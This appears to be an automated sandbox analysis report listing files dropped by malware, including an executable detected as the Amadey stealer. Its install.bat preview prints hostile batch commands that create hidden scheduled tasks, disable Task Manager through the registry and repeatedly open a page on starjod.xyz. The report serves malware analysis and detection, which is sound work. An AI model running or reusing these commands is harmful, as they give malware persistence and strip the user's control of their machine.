MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2ks2xe2.uvr.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mtoqoisv.kom.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhpmyuug.jig.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ywlvcnlw.amq.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zsokxipv.3ku.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	424960
Entropy (8bit):	6.516408105291076
Encrypted:	false
SSDEEP:	12288:5fSPtGpmLb84Jjzo6yrBuKuJ+ITOC0Ud:UtGpmf8edykhV0Ud
MD5:	07101CAC5B9477BA636CD8CA7B9932CB
SHA1:	59EA7FD9AE6DED8C1B7240A4BF9399B4EB3849F1
SHA-256:	488385CD54D14790B03FA7C7DC997EBEA3F7B2A8499E5927EB437A3791102A77
SHA-512:	02240FF51A74966BC31CFCC901105096EB871F588EFAA9BE1A829B4EE6F245BD9DCA37BE7E2946BA6315FEEA75C3DCE5F490847250E62081445CD25B0F406887
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 96%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L...).nf..........................................@.......................................@.................................,....................................K......8...................l..........@............................................text............................... ..`.rdata..:...........................@..@.data....e... ...4..................@....rsrc...............................@..@.reloc...K.......L...0..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\install.bat

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	569
Entropy (8bit):	5.132678254300203
Encrypted:	false
SSDEEP:	12:ZuschlNfj38RmVjhRFIbh/EoxHFQFNuLRXmIZzRDuLRXmIn:Zudhlh8RmV1fToQFYLooSLoI
MD5:	C036E2AAB3F533B08827EEA3C0E7B5DA
SHA1:	8139F8A4CB05461D14B03A173854FC82D895F632
SHA-256:	204284D0B5FB733C99DE0C432588B1961998C6A606C54EF54FA896622D91EE09
SHA-512:	0BA4546DF5266B0EDC000167A22B9C6070B200E5B565B4A2F3781C6FA19C64E27C2DF903BD382E2A03709E5E10815A70319107F87BB9DC7AF880EA1956908411
Malicious:	true
Preview:	schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00 ..reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001 ..schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F ..schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F ..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 23 21:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.984548956775035
Encrypted:	false
SSDEEP:	48:89odWzsT20nb2HJidAKZdA19ehwiZUklqehAy+3:8qXQ/y
MD5:	D517D41144949E68BA17F8BF6FB733B0
SHA1:	A8C0373FDBFCEB8536581045D824FE13E3E44815
SHA-256:	F6A02BBCE197A5E93D3AE1B50AE2BAB8E577BFF59633EBF026250736C975ADD4
SHA-512:	248CD95F40FCF9AE268BA8EFE0DABC5CD1CE57DC7A7A9066BD12B3CEF52414FC48355A1722C2A15C8A947E19E636989DFDE4659FDCC17D3671ED8CEE590AB730
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....,+....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 23 21:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2679
Entropy (8bit):	3.9982321311352185
Encrypted:	false
SSDEEP:	48:8ModWzsT20nb2HJidAKZdA1weh/iZUkAQkqehvy+2:8VXq9Qay
MD5:	90307A7A60768C4C2CF4005A57B8E041
SHA1:	3754F1CB77AE648597E600AB466161BB199C153B
SHA-256:	DE40AABBA578D8F3D5C7A8B4711ECE5C9911A179C7337BE3456B0FB88D35C9A2
SHA-512:	30060F1062D051819ADA5BE2C56B6F61F4AD87F026019A7FC3BDD9124442DE51B7722C12BD5204E5E5AA19AF0B25149044F3D0DA604D9F7860490C18719B9F4F
Malicious:	false
Preview:	L..................F.@.. ...$+.,....L2.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2693
Entropy (8bit):	4.008111859311927
Encrypted:	false
SSDEEP:	48:8xTodWzsT20nbsHJidAKZdA14tseh7sFiZUkmgqeh7sZy+BX:8x8Xgnby
MD5:	D433CA167C68E8ACDC7825AD3D8A1192
SHA1:	1920DAADBF0F6113FF3C353D8082F228B9BF0A70
SHA-256:	80F50036107A99C8E5B1B58EFF9A8E09C6AF8443917D7B87FFA0728EB2E92832
SHA-512:	C5738581F1C5CADE1834E7431F7AB363B73C7DB39B65B0D6BCD90FB9742B25182EA27A12B7B198AA7B6435BFA0352A1192EAA0B19951C593DA46566EAED4FEF4
Malicious:	false
Preview:	L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 23 21:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9982972550405993
Encrypted:	false
SSDEEP:	48:8sodWzsT20nb2HJidAKZdA1vehDiZUkwqehTy+R:81XxRy
MD5:	ACF7F442DD77ED9809B89CDB6B57CA50
SHA1:	957D34D2A5DF9905A10D97E288FCCA690391504D
SHA-256:	5023CDEC4087A76B1470D8440FC8772E84A81A857E9301BACBC4876A829B15E3
SHA-512:	987E5D05C480D4E2A5547F4A2A4B5BC1715CBA7FD1C1850FA23362677A9C1A12BFA05C6831A885A073AF8391EC6F96392F59A5CCDEFD83E6B8CE464E013811ED
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....g.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 23 21:10:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2681
Entropy (8bit):	3.9899729789475056
Encrypted:	false
SSDEEP:	48:8KodWzsT20nb2HJidAKZdA1hehBiZUk1W1qehFy+C:8/XR9ly
MD5:	FCF60494FA4947318041142EEA6CE7F6
SHA1:	D06A0BDE83F46CA283FDD3DEBB6CAF4A17D3E5C9
SHA-256:	BE79710554031637AEC6E051D1879F5A1C85D38C49B51FB86FDCC6F298D751EC
SHA-512:	17A288FD20D58E0634C6EDD5260870183D2E91D16506A616FC28522A01FFC673BCAD5727561F36586A39E92D77B105A21DB25F1466063DC708791C80C04D51B0
Malicious:	false
Preview:	L..................F.@.. ...$+.,..........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Sun Jun 23 21:10:32 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2683
Entropy (8bit):	3.995295820558654
Encrypted:	false
SSDEEP:	48:8lodWzsT20nb2HJidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbby+yT+:8yXNT/TbxWOvTbby7T
MD5:	786A209299B5B27440D4FA6971CE22DB
SHA1:	A43F96A0706F18965D9DCE4E4632A20617F362A2
SHA-256:	5BB8BE8D5E51867BD5E15008B97D7D2665C02FB2A8DD02FF113343A876D3BD74
SHA-512:	F7EBA0A041ABB9477E23A0A8D6E95F193B46EDFE68FDCC2982465DC2D08962E5B2F201B939555AE56ACEE8AE052B679BDD925274B1ED3B48F85D011B0B33918B
Malicious:	false
Preview:	L..................F.@.. ...$+.,....6......N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.XL.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.XL.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.XL.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.XL............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.XQ............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............-!......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e..C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

C:\Windows\Tasks\Hkbsse.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.426389947810139
Encrypted:	false
SSDEEP:	6:nKDzX55ZsUEZ+lX1K+EetFXqYEp5t/uy0lput0:KDzuQ1FnfXVQt0
MD5:	84ED76117896235EB8C265A1C374C31E
SHA1:	13B55564C33A5718121225F3BBFB0B71BF21EFC0
SHA-256:	201065F612C394667556DC9EAE1647FED9787E545BA070FEDC30A5F88B5A588A
SHA-512:	01AE64821E26EB13708C09FB77E46CF4B1D408A7DA3F81A78CAF460DD2B3B1B001B782B0295497F1CFB0A036D16FEBB0BB93E16ADE26A4445E550CF01DFEE9B1
Malicious:	false
Preview:	.......q.D.N....>..F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.b.6.6.a.8.a.e.0.7.6.\.H.k.b.s.s.e...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\Tasks\axplong.job

Download File

Process:	C:\Users\user\Desktop\hsRju5CPK2.exe
File Type:	data
Category:	dropped
Size (bytes):	292
Entropy (8bit):	3.4216295074391256
Encrypted:	false
SSDEEP:	6:T7X45ZsUEZ+lX1YC7UPelkDdtFXqYEp5t/uy0lxt0:TLDQ1h7keeDNfXVxt0
MD5:	959C1DA9650FE64B81A0BE3D1C33C313
SHA1:	3CFA53DDA62325B67CE486C18825D9D04F945E53
SHA-256:	52D1676458D0C46802B3FB49C0D81BEB385EF21333CA941C3DAB350275ECC044
SHA-512:	826DB9A759D5B06A7EA3F0F011DBEE1844504DBA8FC3B43589E5D65136C5AEDAFD7267C5181A0149CACDCF5655D07DB4BEDE295B757D87BF8DE658B464D776A2
Malicious:	false
Preview:	........ .^B.s..Bw.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.8.2.5.4.6.2.4.2.4.3.\.a.x.p.l.o.n.g...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0...................@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421426083457405
Encrypted:	false
SSDEEP:	6144:ZSvfpi6ceLP/9skLmb0OTBWSPHaJG8nAgeMZMMhA2fX4WABlEnNS0uhiTw:QvloTBW+EZMM6DFyc03w
MD5:	529EFAA1769AFBB0582444316A509F6D
SHA1:	7A5A699F81259BE65F549025AF18EE6D37505E52
SHA-256:	177F2CDC74DFCC5C8BDB5109757AC7F5D6A5C6EED5580E29673273BDB7716278
SHA-512:	C82959A370F3B89C3248CE16D28375F3972F4BD52CF71ABC7FFAFCD6F6E4A48EFDE18C50B561C5DE007435ECB438E6912ED514AFD981454358438AABC7009F96
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..."............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Chrome Cache Entry: 129

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows icon resource - 2 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	5430
Entropy (8bit):	3.6534652184263736
Encrypted:	false
SSDEEP:	48:wIJct3xIAxG/7nvWDtZcdYLtX7B6QXL3aqG8Q:wIJct+A47v+rcqlBPG9B
MD5:	F3418A443E7D841097C714D69EC4BCB8
SHA1:	49263695F6B0CDD72F45CF1B775E660FDC36C606
SHA-256:	6DA5620880159634213E197FAFCA1DDE0272153BE3E4590818533FAB8D040770
SHA-512:	82D017C4B7EC8E0C46E8B75DA0CA6A52FD8BCE7FCF4E556CBDF16B49FC81BE9953FE7E25A05F63ECD41C7272E8BB0A9FD9AEDF0AC06CB6032330B096B3702563
Malicious:	false
URL:	https://www.google.com/favicon.ico
Preview:	............ .h...&... .... .........(....... ..... ............................................0...................................................................................................................................v.].X.:.X.:.r.Y........................................q.X.S.4.S.4.S.4.S.4.S.4.S.4...X....................0........q.W.S.4.X.:.................J...A...g.........................K.H.V.8..........................F..B.....................,.......................................B..............................................B..B..B..B..B...u..........................................B..B..B..B..B...{.................5.......k...........................................................7R..8F.................................................2........Vb..5C..;I..................R^.....................0................Xc..5C..5C..5C..5C..5C..5C..lv..........................................]i..<J..:G..Zf....................................................

Chrome Cache Entry: 130

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	2833
Entropy (8bit):	7.876846206921263
Encrypted:	false
SSDEEP:	48:Kw15hc/Pj2itdgjeVVO/SzBdCvhaHAlJX7XnF/HDoSH8T78atjZeHMBx/F/WssM:J15hc/Pj2mdgjMjusgl5XFD3MoIx9eg
MD5:	18C023BC439B446F91BF942270882422
SHA1:	768D59E3085976DBA252232A65A4AF562675F782
SHA-256:	E0E71ACEF1EFBFAB69A1A60CD8FADDED948D0E47A0A27C59A0BE7033F6A84482
SHA-512:	A95AD7B48596BC0AF23D05D1E58681E5D65E707247F96C5BC088880F4525312A1834A89615A0E33AEA6B066793088A193EC29B5C96EA216F531C443487AE0735
Malicious:	false
URL:	https://iplogger.co/favicon.ico
Preview:	.PNG........IHDR...@...@......iq.....IDATx.....e.._Osm...,uY.sYI.w.$..........:VjD..!...o%....5$......... (..;~8."......h...r.^/}...\|..qm.O.w..I.m....>..y>.?_.....;_=.b.R4X..4.2....S!.P.m>......*`........@.....O...\,...o..@..RS.5.3.....M..@.....>..\|....2p ......v...-a.9........V..0.X....`(.....TH.i....o:.....'p3.[.Lx.q.1.....XN/j.M...y..+....!r.P........F.6....M.W./".QK.....?...r....f.7.?...7..y@..-` ......f.7..x.......z-......u6D...M.=.6D....`X..>.......`....?..-....s..\..._...Vc.&......rzM...9B....dJp.......\|....@..O....."je...oGL..1.......R!5\.Q.7.......Mb.x.x....)E.u.b9.Ad.<..x.8.L!...8...aV#..\|>.R...9+.....P......~..^...;?.#q......d.G.a`..I...c9..\..Cc',.l.-.......m.H..E......s.s...:.l>....L....u...g#Q..0.<...3.~=b.....TH.....M......K..a..R48....W.[..6...?...3.)..r.WHd8...o(.^.....]..~.8ef49..F......d.QF.zg).,.#.E.-..q..L.....^.u.x.XY....,.......C.i=lJ..c.?.4E=@......Y.r...`......Z.8].....A../.R...5.-.YG1...b.....y..x.".'Y...b1.....K..$..">..

Chrome Cache Entry: 131

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	526
Entropy (8bit):	5.080921461129606
Encrypted:	false
SSDEEP:	12:4krY1trWPqfcb6IpGrrLswD3Ub6IpGrrLswDOQrpAb6IpGrrLswDRv:zs1T0WEGrhLUWEGrhxCWEGrhdv
MD5:	1AFE8EE6484D5A907583F5E1A0A8F077
SHA1:	E05ADB2F01D7876E48E70E81D9316C43EC17441E
SHA-256:	68F3757410A812B3665157DA45C8F90C22A952C6F94CB25B49FA4FBDBFA0F1BF
SHA-512:	3758A998FFF4A1CE6977609407E03CE39E3AD7C502D35108926DA48D448A188533D24249E6007F450A1AC836DCE69E6C45E58D1C45E65379036AF56E65E6BCE0
Malicious:	false
